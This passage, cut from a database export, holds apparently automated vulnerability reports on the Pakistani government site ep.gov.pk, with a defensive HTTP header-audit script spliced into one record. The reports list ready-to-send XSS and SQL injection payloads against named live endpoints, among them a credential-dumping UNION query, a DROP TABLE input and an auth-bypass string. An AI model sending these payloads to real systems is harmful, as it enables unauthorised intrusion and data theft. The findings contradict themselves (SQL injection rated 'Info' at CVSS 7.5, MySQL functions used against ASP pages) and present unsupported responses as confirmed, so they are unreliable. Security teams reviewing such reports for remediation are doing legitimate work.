Severity | Info |\n| CVSS Score | N/A |\n| Category | web_vulnerability |\n| Asset / URL | https://ep.gov.pk/ |\n\n**Description**  \nThis entry indicates that a Nikto scan was performed against the target asset `https://ep.gov.pk/`. Nikto is an open-source web server scanner which performs comprehensive tests against web servers for multiple items including over 6700 potentially dangerous files/CGIs, outdated server versions, and various server configuration issues. This log does not indicate any specific vulnerability but rather confirms that a scan occurred.\n\n**Attack Scenario (Proof of Concept)**  \nAs this is merely a logging event indicating completion of a scan tool, there is no direct exploitation path. However, attackers may use tools like Nikto during reconnaissance phases to enumerate known vulnerabilities or misconfigurations on web servers.\n\nExample usage:\n```bash\nnikto -h https://ep.gov.pk/\n```\n\n**Business Impact**  \nWhile this finding itself has no impact, its presence suggests that automated scanning activity has taken place, possibly by threat actors or internal security teams. 
It highlights the importance of monitoring such activities and ensuring systems are hardened against common exposures.\n\n**Remediation**  \nThere is no remediation required for this informational finding. Ensure regular patching and hardening practices are followed to reduce exposure to findings identified by scanners like Nikto.\n\n---\n\n### [Content Security Policy Configuration / https://ep.gov.pk/ / GET]\n\n| Field | Value |\n|---|---|\n| Severity | Low |\n| CVSS Score | 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://ep.gov.pk/ |\n\n**Description**  \nA Content Security Policy (CSP) header defines approved sources of content that the browser may load. Its absence means that once script is injected (see the two reflected XSS findings on this host below) nothing stops it from running or from loading further code from attacker-controlled domains. CSP does not remove the injection flaw; it is the second line of defence behind output encoding.\n\n**Attack Scenario (Proof of Concept)**  \nAn attacker could inject arbitrary JavaScript into pages lacking CSP enforcement:\n\nRequest:\n```http\nGET / HTTP/1.1\nHost: ep.gov.pk\n```\n\nResponse lacks `Content-Security-Policy` header:\n```http\nHTTP/1.1 200 OK\nServer: Apache\n...\n```\n\nPayload Example:\n```html\n<script>alert('XSS')</script>\n```\n\nIf reflected without sanitization, this executes in user browsers; `/track.asp` and `/Flyers.asp` below are confirmed reflection points.\n\n**Business Impact**  \nWithout CSP, the site is more exposed to cross-site scripting (XSS), clickjacking (via the missing `frame-ancestors` directive), and data leakage. These can lead to compromised sessions, defacement, or phishing attacks targeting users.\n\n**Remediation**  \nImplement a CSP via HTTP response headers, deploying it in report-only mode first to find inline scripts and third-party sources the policy would break. Example target policy, using a per-response nonce for the site's own inline scripts (`<random-per-response>` is a placeholder for a value generated freshly on every response):\n```apache\nHeader always set Content-Security-Policy \"default-src 'self'; script-src 'self' 'nonce-<random-per-response>'; object-src 'none'; base-uri 'self'; frame-ancestors 'self'\"\n```\nA policy with `'unsafe-inline'` in `script-src` and no nonce or hash allows exactly the injected inline scripts CSP is meant to block, so it is acceptable only as a temporary migration step.\n\nReference: [OWASP CSP](https://owasp.org/www-community/controls/Content_Security_Policy), CWE-693\n\n---\n\n### [Clickjacking Protection / https://ep.gov.pk/ / GET]\n\n| Field | Value |\n|---|---|\n| Severity | Low |\n| CVSS Score | 4.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://ep.gov.pk/ |\n\n**Description**  \nThe `X-Frame-Options` header prevents rendering of the page within frames, protecting against clickjacking attacks. Without it (and without a CSP `frame-ancestors` directive), attackers can embed the page inside an iframe and trick users into performing unintended actions.\n\n**Attack Scenario (Proof of Concept)**  \nAttacker creates a malicious HTML page embedding the target:\n```html\n<iframe src=\"https://ep.gov.pk/\" width=\"100%\" height=\"100%\"></iframe>\n```\nBy making the iframe transparent and placing it above decoy content, they route the victim's clicks into the framed page, leading to unintended actions such as submitting a form on the victim's behalf.\n\n**Business Impact**  \nUsers might unknowingly perform sensitive actions (e.g., submitting forms, changing settings) under attacker control, resulting in account compromise or fraudulent transactions.\n\n**Remediation**  \nAdd the following header to all responses:\n```apache\nHeader always set X-Frame-Options DENY\n```\nOr, if the site frames its own pages:\n```apache\nHeader always set X-Frame-Options SAMEORIGIN\n```\nTo allow a specific list of other origins to frame the site, use the CSP `frame-ancestors` directive instead; `X-Frame-Options: ALLOW-FROM` is obsolete and ignored by current browsers.\n\nReference: [OWASP Clickjacking](https://owasp.org/www-community/attacks/Clickjacking), CWE-1021\n\n---\n\n### [HTTP Strict Transport Security (HSTS) / https://ep.gov.pk/ / GET]\n\n| Field | Value |\n|---|---|\n| Severity | Low |\n| CVSS Score | 5.9 (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://ep.gov.pk/ |\n\n**Description**  \nThe `Strict-Transport-Security` header is missing, so browsers are never told to refuse plain-HTTP connections to this host. Attackers on the network path can exploit this with protocol downgrade (SSL-stripping) attacks to intercept traffic.\n\n**Attack Scenario (Proof of Concept)**  \nUser accesses `http://ep.gov.pk` and is normally redirected to HTTPS. An on-path attacker intercepts the initial HTTP request and either redirects to a fake login portal or proxies the real site while keeping the victim's side of the connection on HTTP.\n\n**Business Impact**  \nRisk of credential theft, session hijacking, and eavesdropping due to insecure connections being accepted.\n\n**Remediation**  \nSet the HSTS header on every HTTPS response:\n```apache\nHeader always set Strict-Transport-Security \"max-age=31536000; includeSubDomains; preload\"\n```\nEnsure TLS is properly configured on every subdomain before enabling HSTS, and add `preload` only when ready to submit the domain to the preload list.  \nReference: [OWASP HSTS](https://owasp.org/www-project-cheat-sheets/cheatsheets/HTTP_Strict_Transport_Security_Cheat_Sheet.html), CWE-319\n\n---\n\n### [MIME Type Confusion / https://ep.gov.pk/ / GET]\n\n| Field | Value |\n|---|---|\n| Severity | Low |\n| CVSS Score | 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://ep.gov.pk/ |\n\n**Description**  \nAbsence of the `X-Content-Type-Options: nosniff` header allows browsers to guess MIME types based on file contents. Content that should be inert (an image, a text file) can then be interpreted as HTML or script, facilitating XSS or drive-by downloads.\n\n**Attack Scenario (Proof of Concept)**  \nUpload a `.jpg` file whose bytes are actually HTML containing JavaScript. If the upload handler serves it without an accurate `Content-Type` and `nosniff` is missing, a browser may render it as HTML when opened directly, and an attacker's page can load it via `<script src>`, which `nosniff` would refuse because the response is not a JavaScript type.\n\n**Business Impact**  \nPotential for XSS, malware delivery, and bypassing content-type restrictions.\n\n**Remediation**  \nEnforce correct MIME handling:\n```apache\nHeader always set X-Content-Type-Options nosniff\n```\nAlso ensure accurate server-side MIME declarations.  
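The header findings repeated across all three reports (HSTS, X-Content-Type-Options, X-Frame-Options or CSP `frame-ancestors`, CSP, Cache-Control) come down to the same check: parse one response and test each header against the rules the remediations describe. The audit below is an added example, not scanner output or code from the scanned sites; both sample responses are constructed by hand (the weak one shaped like what the scanner saw, the fixed one carrying the recommended headers), and `ONE_YEAR` is the `max-age` floor the remediations use.

```python
# Added example, not part of the scanner output: audit one raw HTTP response for the
# header gaps reported above (HSTS, X-Content-Type-Options, X-Frame-Options or CSP
# frame-ancestors, CSP script restrictions, Cache-Control on cookie-setting pages).
# Both responses are constructed by hand; nothing was fetched from the hosts named.
ONE_YEAR = 31536000

SAMPLE_WEAK = '''HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=31536000
Set-Cookie: ASP.NET_SessionId=abc123; Path=/

<html>...</html>'''

SAMPLE_FIXED = '''HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Cache-Control: no-store
Set-Cookie: ASP.NET_SessionId=abc123; Path=/; Secure; HttpOnly; SameSite=Lax
Strict-Transport-Security: max-age=31536000; includeSubDomains
X-Content-Type-Options: nosniff
Content-Security-Policy: default-src 'self'; script-src 'self' 'nonce-d2hhdGV2ZXI'; object-src 'none'; frame-ancestors 'self'

<html>...</html>'''

def parse_headers(raw):
    """Return {lowercased-name: value} for the header block of a raw response."""
    headers = {}
    for line in raw.splitlines()[1:]:
        if not line.strip():
            break                     # blank line ends the header block
        name, sep, value = line.partition(':')
        if sep:
            key = name.strip().lower()
            # repeated headers (Set-Cookie) are comma-joined; enough for this audit
            headers[key] = (headers[key] + ', ' + value.strip()) if key in headers else value.strip()
    return headers

def parse_hsts(value):
    """Parse Strict-Transport-Security; max-age may be quoted (RFC 6797 allows it)."""
    out = {'max_age': None, 'include_subdomains': False, 'preload': False}
    for directive in value.split(';'):
        name, _, val = directive.strip().partition('=')
        name, val = name.strip().lower(), val.strip().strip('"')
        if name == 'max-age' and val.isdigit():
            out['max_age'] = int(val)
        elif name in ('includesubdomains', 'preload'):
            out['include_subdomains' if name == 'includesubdomains' else 'preload'] = True
    return out

def parse_csp(value):
    """Return {directive: [sources]} from a Content-Security-Policy value."""
    policy = {}
    for directive in value.split(';'):
        tokens = directive.split()
        if tokens:
            policy[tokens[0].lower()] = tokens[1:]
    return policy

def script_policy_is_strict(policy):
    """Inline script injection is blocked when script-src (or the default-src fallback)
    exists and either omits 'unsafe-inline' or carries a nonce/hash, which makes
    CSP2+ browsers ignore 'unsafe-inline'."""
    sources = policy.get('script-src', policy.get('default-src'))
    if sources is None:
        return False
    nonce_or_hash = any(s.startswith(("'nonce-", "'sha256-", "'sha384-", "'sha512-")) for s in sources)
    return "'unsafe-inline'" not in sources or nonce_or_hash

def audit(raw):
    """Return {check: (passed, detail)} for one raw response."""
    h, out = parse_headers(raw), {}
    hsts = h.get('strict-transport-security')
    if hsts is None:
        out['hsts'] = (False, 'not set (check the HTTPS response; the header is ignored over HTTP)')
    else:
        p = parse_hsts(hsts)
        max_age = p['max_age']
        if max_age is None or max_age < ONE_YEAR:
            out['hsts'] = (False, f'max-age {max_age} is below one year ({ONE_YEAR})')
        else:
            out['hsts'] = (True, hsts + ('' if p['include_subdomains'] else ' (no includeSubDomains)'))
    xcto = h.get('x-content-type-options', '')
    out['nosniff'] = (xcto.strip().lower() == 'nosniff', xcto or 'not set')
    csp = parse_csp(h.get('content-security-policy', ''))
    xfo = h.get('x-frame-options', '').strip().lower()
    framed_ok = 'frame-ancestors' in csp or xfo in ('deny', 'sameorigin')
    out['framing'] = (framed_ok, 'protected' if framed_ok else 'no X-Frame-Options and no frame-ancestors: page can be framed')
    if not csp:
        out['csp'] = (False, 'not set')
    elif not script_policy_is_strict(csp):
        out['csp'] = (False, "script-src allows 'unsafe-inline' without nonce/hash: no XSS mitigation")
    else:
        out['csp'] = (True, h['content-security-policy'])
    if 'set-cookie' in h:          # a cookie-setting response must never land in a shared cache
        cc = h.get('cache-control', '').lower()
        out['cache'] = ('no-store' in cc or 'private' in cc, cc or 'not set on a cookie-setting response')
    return out

def failing_checks(raw):
    """Sorted names of failed checks, convenient as a pipeline gate."""
    return sorted(name for name, (ok, _) in audit(raw).items() if not ok)
```

Feed it the output of `curl -sI https://<host>/` (the HTTPS response, since HSTS is ignored over HTTP). `failing_checks(SAMPLE_WEAK)` returns all five check names and `failing_checks(SAMPLE_FIXED)` returns an empty list; the CSP check deliberately fails a policy whose `script-src` contains `'unsafe-inline'` without a nonce or hash, which is the weak configuration the remediations above warn against.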
\nReference: [OWASP Secure Headers Project](https://owasp.org/www-project-secure-headers/#x-content-type-options), CWE-16\n\n---\n\n### [Inconsistent Redirection / https://ep.gov.pk/ep_Complaint/Default_Test.aspx / POST]\n\n| Field | Value |\n|---|---|\n| Severity | Medium |\n| CVSS Score | 6.1 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://ep.gov.pk/ep_Complaint/Default_Test.aspx |\n\n**Description**  \nWhen issuing a redirect (HTTP 3xx status), the server also returns a full HTML body containing links or forms. Browsers discard that body and follow `Location`, but any client that does not auto-follow redirects (API consumers, some proxies and crawlers, a browser with redirects blocked) renders it instead. If the body echoes request parameters it becomes a reflection point that the redirect normally hides, and in any case it exposes page content the redirect was meant to replace.\n\n**Attack Scenario (Proof of Concept)**  \nPOST request triggers redirect with embedded form:\n```http\nPOST /ep_Complaint/Default_Test.aspx HTTP/1.1\nContent-Type: application/x-www-form-urlencoded\n...\n\ntxt_ArticleNo=<malicious_input>\n\nHTTP/1.1 302 Found\nLocation: /error.html\n\n<html><body><form action=\"/phish\" method=\"post\">...</form></body></html>\n```\n\nCheck whether the submitted value is reflected into that body: `curl -s -i --data 'txt_ArticleNo=<value>' https://ep.gov.pk/ep_Complaint/Default_Test.aspx` (with `<value>` a marker string of your choosing) prints the 302 and its body without following the redirect.\n\n**Business Impact**  \nRedirects with unexpected content can facilitate phishing attempts or confuse clients relying on standard HTTP semantics.\n\n**Remediation**  \nEnsure 3xx responses contain minimal/no body content. In ASP.NET, use `Response.Redirect(url)` with its default `endResponse` behaviour, which stops page rendering, rather than setting a 3xx status and letting the page continue to render; remove unnecessary HTML from redirect responses.  
\nReference: [RFC 7231 Section 6.4](https://tools.ietf.org/html/rfc7231#section-6.4)\n\n---\n\n### [Reflected XSS via textfieldz / https://ep.gov.pk/track.asp / POST]\n\n| Field | Value |\n|---|---|\n| Severity | Medium |\n| CVSS Score | 6.1 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://ep.gov.pk/track.asp |\n\n**Description**  \nInput from the `textfieldz` parameter is directly echoed back in the response without encoding, allowing execution of arbitrary scripts when rendered in the victim's browser. Because the parameter is sent by POST, the attacker needs the victim to submit a form (for example an auto-submitting form on an attacker page) rather than just follow a link; the missing CSP and `X-Frame-Options` findings above make that easier.\n\n**Attack Scenario (Proof of Concept)**  \nSubmit payload via POST:\n```http\nPOST /track.asp HTTP/1.1\nHost: ep.gov.pk\nContent-Type: application/x-www-form-urlencoded\n\ntextfieldz=<script>alert(document.cookie)</script>\n```\n\nResponse reflects unsanitized input:\n```html\n<p>You searched for: <script>alert(document.cookie)</script></p>\n```\n\n**Business Impact**  \nSession hijacking, credential theft, and social engineering attacks possible through crafted forms or URLs.\n\n**Remediation**  \nEncode output for the context it is written into. For this HTML body context the classic ASP fix is:\n```asp\nResponse.Write Server.HTMLEncode(Request.Form(\"textfieldz\"))\n```\n`Server.HTMLEncode` is correct for text between tags and inside quoted attribute values; a value written into a JavaScript block or a URL needs JavaScript or URL encoding instead. Use frameworks with auto-escaping features.  
\nReference: [OWASP XSS Prevention Cheat Sheet](https://owasp.org/www-community/xss-filter-evasion-cheatsheet), CWE-79\n\n---\n\n### [Reflected XSS via n / https://ep.gov.pk/Flyers.asp / GET]\n\n| Field | Value |\n|---|---|\n| Severity | Medium |\n| CVSS Score | 6.1 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://ep.gov.pk/Flyers.asp |\n\n**Description**  \nThe `n` query parameter is reflected unsafely in the response, enabling script injection via crafted URLs.\n\n**Attack Scenario (Proof of Concept)**  \nVisit:\n```\nhttps://ep.gov.pk/Flyers.asp?n=<img src=x onerror=alert(1)>\n```\n\nPage renders unescaped input:\n```html\n<h1>Flyer: <img src=x onerror=alert(1)></h1>\n```\n\n**Business Impact**  \nSame as previous XSS case—session theft, phishing, and reputational harm.\n\n**Remediation**  \nApply contextual encoding:\n```asp\nResponse.Write Server.HTMLEncode(Request.QueryString(\"n\"))\n```\nValidate/sanitize inputs at entry points.  \nReference: CWE-79, OWASP Top Ten A03\n\n---\n\n### [SQL Injection via Type / https://ep.gov.pk/tariff/emsp_tariff.aspx / GET]\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) |\n| Category | web_vulnerability |\n| Asset / URL | https://ep.gov.pk/tariff/emsp_tariff.aspx |\n\n**Description**  \nParameter `Type` appears susceptible to SQL injection, suggesting backend database queries are constructed dynamically using unsanitized user input.\n\n**Attack Scenario (Proof of Concept)**  \nAccess:\n```\nhttps://ep.gov.pk/tariff/emsp_tariff.aspx?Type=' OR '1'='1\n```\n\nMay return full dataset or trigger errors revealing DB structure.\n\n**Business Impact**  \nData exfiltration, unauthorized access, and system compromise.\n\n**Remediation**  \nUse parameterized queries:\n```sql\nSELECT * FROM tariffs WHERE type = @type\n```\nAvoid dynamic concatenation of SQL strings.  
\nReference: CWE-89, OWASP SQL Injection Prevention Cheat Sheet\n\n---\n\n### [SQL Injection via Zone / https://ep.gov.pk/tariff/emsp_tariff.aspx / GET]\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) |\n| Category | web_vulnerability |\n| Asset / URL | https://ep.gov.pk/tariff/emsp_tariff.aspx |\n\n**Description**  \nSimilar to above, the `Zone` parameter exhibits signs of SQL injection susceptibility.\n\n**Attack Scenario (Proof of Concept)**  \nURL:\n```\nhttps://ep.gov.pk/tariff/emsp_tariff.aspx?Zone=' UNION SELECT username,password FROM admin--\n```\n\nCould leak administrative credentials if improperly handled.\n\n**Business Impact**  \nSevere data breach potential including PII and administrative access.\n\n**Remediation**  \nApply the same fixes as for `Type`: use prepared statements and validate inputs strictly.  \nReference: CWE-89\n\n---\n\n### [Internal Server Error (Type) / https://ep.gov.pk/tariff/emsp_tariff.aspx / GET]\n\n| Field | Value |\n|---|---|\n| Severity | High |\n| CVSS Score | 7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) |\n| Category | web_vulnerability |\n| Asset / URL | https://ep.gov.pk/tariff/emsp_tariff.aspx |\n\n**Description**  \nAn injection attempt caused a 500 Internal Server Error, indicating poor error handling and likely improper validation of the `Type` parameter.\n\n**Attack Scenario (Proof of Concept)**  \nSend malformed input:\n```\nhttps://ep.gov.pk/tariff/emsp_tariff.aspx?Type='%20AND%20SLEEP(5)--\n```\n\nServer crashes or times out, confirming vulnerability.\n\n**Business Impact**  \nDenial-of-service, information disclosure about backend infrastructure, and potential escalation paths.\n\n**Remediation**  \nImplement robust input validation and graceful error handling (reject non-numeric input with a 400 before it reaches the query, rather than suppressing errors with `On Error Resume Next`):\n```asp\nIf Not IsNumeric(Request.QueryString(\"Type\")) Then\n    Response.Status = \"400 Bad Request\"\n    Response.End\nEnd If\n```\nLog exceptions securely without exposing stack traces.  
\nReference: CWE-20, CWE-248\n\n---\n\n### [Internal Server Error (Zone) / https://ep.gov.pk/tariff/emsp_tariff.aspx / GET]\n\n| Field | Value |\n|---|---|\n| Severity | High |\n| CVSS Score | 7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) |\n| Category | web_vulnerability |\n| Asset / URL | https://ep.gov.pk/tariff/emsp_tariff.aspx |\n\n**Description**  \nSame root cause as above; invalid input leads to server crash.\n\n**Attack Scenario (Proof of Concept)**  \nMalformed request:\n```\nhttps://ep.gov.pk/tariff/emsp_tariff.aspx?Zone=') OR 1=1 --\n```\n\nResults in server-side exception and 500 error.\n\n**Business Impact**  \nService disruption, debugging information leaks, and possible further exploitation.\n\n**Remediation**  \nFollow same remediation steps as for `Type`.  \nReference: CWE-20, CWE-248\n\n---\n\n### [Internal Server Error (value) / https://ep.gov.pk/Calculate_Postage/cod_calculated_postage.asp / POST]\n\n| Field | Value |\n|---|---|\n| Severity | High |\n| CVSS Score | 7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) |\n| Category | web_vulnerability |\n| Asset / URL | https://ep.gov.pk/Calculate_Postage/cod_calculated_postage.asp |\n\n**Description**  \nPOST parameter `value` causes server failure upon injection attempt, pointing to flawed input processing logic.\n\n**Attack Scenario (Proof of Concept)**  \nPOST Body:\n```\nvalue=' OR 1=1 --\n```\n\nCauses backend to fail catastrophically.\n\n**Business Impact**  \nDoS, backend instability, and possible deeper exploitation opportunities.\n\n**Remediation**  \nSanitize and validate all POST parameters rigorously. Avoid raw interpolation into backend logic.  
\nReference: CWE-20, CWE-248\n\n---\n\n### [Internal Server Error (uid) / https://ep.gov.pk/HQ/AuthLocation.asp / POST]\n\n| Field | Value |\n|---|---|\n| Severity | High |\n| CVSS Score | 7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) |\n| Category | web_vulnerability |\n| Asset / URL | https://ep.gov.pk/HQ/AuthLocation.asp |\n\n**Description**  \nAuthentication-related endpoint fails when receiving unexpected input in `uid`.\n\n**Attack Scenario (Proof of Concept)**  \nPOST:\n```\nuid=admin' --\n```\n\nLeads to authentication bypass or backend crash.\n\n**Business Impact**  \nPotential privilege escalation or denial of service affecting critical auth functionality.\n\n**Remediation**  \nUse strict input validation and secure coding practices around authentication flows.  \nReference: CWE-20, CWE-287\n\n---\n\n### [Internal Server Error (txt_ArticleNo) / https://ep.gov.pk/ep_Complaint/Default_Test.aspx / POST]\n\n| Field | Value |\n|---|---|\n| Severity | High |\n| CVSS Score | 7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) |\n| Category | web_vulnerability |\n| Asset / URL | https://ep.gov.pk/ep_Complaint/Default_Test.aspx |\n\n**Description**  \nComplaint submission field `txt_ArticleNo` triggers server errors when manipulated.\n\n**Attack Scenario (Proof of Concept)**  \nInput:\n```\ntxt_ArticleNo='; DROP TABLE complaints; --\n```\n\nMay cause catastrophic failures depending on implementation.\n\n**Business Impact**  \nDisruption of complaint tracking services, possible data loss.\n\n**Remediation**  \nSanitize all user inputs before passing them to backend systems.  
\nReference: CWE-20, CWE-78\n\n---\n\n### [Internal Server Error (Country_Name) / https://ep.gov.pk/tariff/emsp_tariff.aspx / GET]\n\n| Field | Value |\n|---|---|\n| Severity | High |\n| CVSS Score | 7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) |\n| Category | web_vulnerability |\n| Asset / URL | https://ep.gov.pk/tariff/emsp_tariff.aspx |\n\n**Description**  \nQuery string parameter `Country_Name` induces server crash when tampered with.\n\n**Attack Scenario (Proof of Concept)**  \nURL:\n```\nhttps://ep.gov.pk/tariff/emsp_tariff.aspx?Country_Name=' OR SLEEP(10) --\n```\n\nTriggers timeout or crash.\n\n**Business Impact**  \nDoS, backend instability, and potential for deeper exploitation.\n\n**Remediation**  \nValidate and sanitize all query parameters. Implement rate limiting and input constraints.  \nReference: CWE-20, CWE-400","summary":{"total":16}},"summary":{"total":16}},{"_id":{"$oid":"6a103a1934b5e5e757fa513f"},"created_at":{"$date":"2026-05-22T11:12:25.758Z"},"url":"https://ep.gov.pk/","tool":"generate_web_vulnerability_report","result":{"url":"https://ep.gov.pk/","category":"web_vulnerability","timestamp":"2026-05-22T11:12:25.747361+00:00","report":"### [Nikto Scan Completion / https://ep.gov.pk/ / Root Path]\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://ep.gov.pk/ |\n\n**Description**  \nThis finding indicates that a Nikto scan was successfully executed against the target asset `https://ep.gov.pk/`. Nikto is an open-source web server scanner which performs comprehensive tests against web servers for multiple items, including over 6700 potentially dangerous files/CGIs, checks for outdated server software, and various server configuration issues. 
The completion of such a scan does not inherently represent a vulnerability; rather, it signifies reconnaissance activity that may precede more targeted attacks.\n\nThe low confidence rating suggests that this entry reflects tool execution metadata rather than a confirmed security exposure. It serves as an indicator of potential probing or automated scanning behavior directed at the host.\n\n**Attack Scenario (Proof of Concept)**  \nWhile this finding itself is non-exploitable, it represents typical early-stage reconnaissance conducted by attackers prior to exploitation:\n\n1. An adversary runs Nikto using default settings:\n   ```bash\n   nikto -h https://ep.gov.pk/\n   ```\n2. The tool queries the web server for known vulnerable paths, misconfigurations, and outdated components.\n3. Output includes informational entries about server headers, HTTP methods allowed, presence of `robots.txt`, and other passive fingerprinting data.\n4. Based on results, further targeted attacks can be crafted—such as exploiting weak authentication mechanisms, testing for directory traversal, or identifying legacy CMS versions with public exploits.\n\nExample output line from Nikto:\n```\n+ Server: Apache/2.4.6 (CentOS)\n+ Retrieved x-powered-by header: PHP/5.4.16\n```\n\nThese details help adversaries tailor follow-up attacks based on observed technologies and configurations.\n\n**Business Impact**  \nAlthough this finding has no direct impact, its occurrence signals possible reconnaissance activity targeting the organization’s public-facing infrastructure. Repeated scans could indicate preparation for future intrusions. 
If left unchecked, these activities might escalate into successful compromises via unpatched vulnerabilities or insecure configurations detected during scanning.\n\nAdditionally, frequent automated scanning may contribute to log noise and consume system resources, though typically minimal in most environments.\n\n**Remediation**  \nSince this is an informational finding related to detection of scanning activity, remediation focuses on hardening and monitoring practices:\n\n- **Restrict Unnecessary Access**: Implement IP allowlisting where feasible to limit access to critical endpoints.\n- **Deploy Web Application Firewall (WAF)**: Configure rules to detect and block common scanners like Nikto based on user-agent strings or abnormal request patterns.\n- **Log Analysis & Alerting**: Monitor access logs for repeated requests indicative of automated tools.\n- **Keep Systems Updated**: Ensure all web server software and applications are up to date to reduce exposure identified by scanners.\n- **Disable Information Disclosure**: Strip out verbose banners and headers revealing exact versions of underlying technologies.\n\nReference standards:\n- CWE-200: Exposure of Sensitive Information to an Unauthorized Actor\n- OWASP Top Ten 2021 – A05: Security Misconfiguration\n\nNo code-level fix applies directly since this finding pertains to external scanner usage rather than application flaws.","summary":{"total":1}},"summary":{"total":1}},{"_id":{"$oid":"6a135d325721216a08993b02"},"created_at":{"$date":"2026-05-24T20:18:58.143Z"},"url":"https://cp-club-vjti.vercel.app/","tool":"generate_web_vulnerability_report","result":{"url":"https://cp-club-vjti.vercel.app/","category":"web_vulnerability","timestamp":"2026-05-24T20:18:58.137426+00:00","report":"An error occurred (UnrecognizedClientException) when calling the Converse operation: The security token included in the request is 
invalid.","summary":{"total":23}},"summary":{"total":23}},{"_id":{"$oid":"6a142b38d3dd196beae9db79"},"created_at":{"$date":"2026-05-25T10:58:00.331Z"},"url":"https://ep.gov.pk/","tool":"generate_web_vulnerability_report","result":{"url":"https://ep.gov.pk/","category":"web_vulnerability","timestamp":"2026-05-25T10:58:00.324770+00:00","report":"### [Nikto Scan Completion / https://ep.gov.pk/ / Root Path]\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://ep.gov.pk/ |\n\n**Description**\nA comprehensive web server security scan was conducted against the target application, resulting in the identification of various informational and low-level security observations. This finding indicates that the scanning process successfully completed and enumerated baseline server configuration details, HTTP headers, known vulnerabilities in outdated components, and common misconfigurations. The scan examined server banners, HTTP methods, directory listings, known vulnerable files/scripts, and security header implementations. While no critical vulnerabilities were identified at this stage, the completion of the scan provides a foundation for deeper security analysis and reveals the attack surface available to potential adversaries.\n\n**Attack Scenario (Proof of Concept)**\nAn attacker would typically initiate reconnaissance by performing automated scanning against the web application to map the available services and identify potential entry points. The scanning process would involve:\n\n1. Enumerating HTTP response headers to identify server software versions:\n   ```\n   GET / HTTP/1.1\n   Host: ep.gov.pk\n   User-Agent: Mozilla/5.0\n   ```\n\n2. Testing for enabled HTTP methods that could be abused:\n   ```\n   OPTIONS / HTTP/1.1\n   Host: ep.gov.pk\n   ```\n\n3. 
Probing for common directories and files that might expose sensitive information:\n   ```\n   GET /admin/ HTTP/1.1\n   Host: ep.gov.pk\n   \n   GET /backup/ HTTP/1.1\n   Host: ep.gov.pk\n   ```\n\n4. Checking for the presence of development artifacts or configuration files:\n   ```\n   GET /robots.txt HTTP/1.1\n   Host: ep.gov.pk\n   \n   GET /.git/ HTTP/1.1\n   Host: ep.gov.pk\n   ```\n\nThe successful completion of such scanning provides attackers with intelligence about the underlying technology stack, potential vulnerabilities in web server software, and misconfigured resources that could serve as initial footholds for more sophisticated attacks.\n\n**Business Impact**\nWhile this finding represents an informational observation rather than an exploitable vulnerability, it demonstrates that the target application is actively being scanned and analyzed by automated tools. This creates several business risks including potential exposure of server configuration weaknesses that could lead to more serious compromises, identification of outdated components that may contain known vulnerabilities, and mapping of the application's attack surface by malicious actors. The organization faces increased risk of targeted attacks based on the intelligence gathered during scanning activities, potential regulatory scrutiny if sensitive information is inadvertently exposed through misconfigurations, and reputational damage if attackers leverage identified weaknesses to compromise the application or access sensitive citizen data. 
Additionally, repeated scanning activity may indicate ongoing reconnaissance by threat actors, suggesting the need for enhanced monitoring and incident response capabilities.","summary":{"total":1}},"summary":{"total":1}},{"_id":{"$oid":"6a155d90a01e67ec8ef1bbf0"},"created_at":{"$date":"2026-05-26T08:45:04.339Z"},"url":"https://ep.gov.pk/","tool":"generate_web_vulnerability_report","result":{"url":"https://ep.gov.pk/","category":"web_vulnerability","timestamp":"2026-05-26T08:45:04.332008+00:00","report":"### [Nikto Scan Completion / https://ep.gov.pk/ / Root Path]\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://ep.gov.pk/ |\n\n**Description**\nThe completion of a web server scanning process indicates that automated reconnaissance activities were conducted against the target web application. This represents an information-gathering phase where various known vulnerabilities, misconfigurations, and security weaknesses are systematically checked. The scan typically examines server headers, HTTP methods, directory listings, known vulnerable files, and common security misconfigurations. 
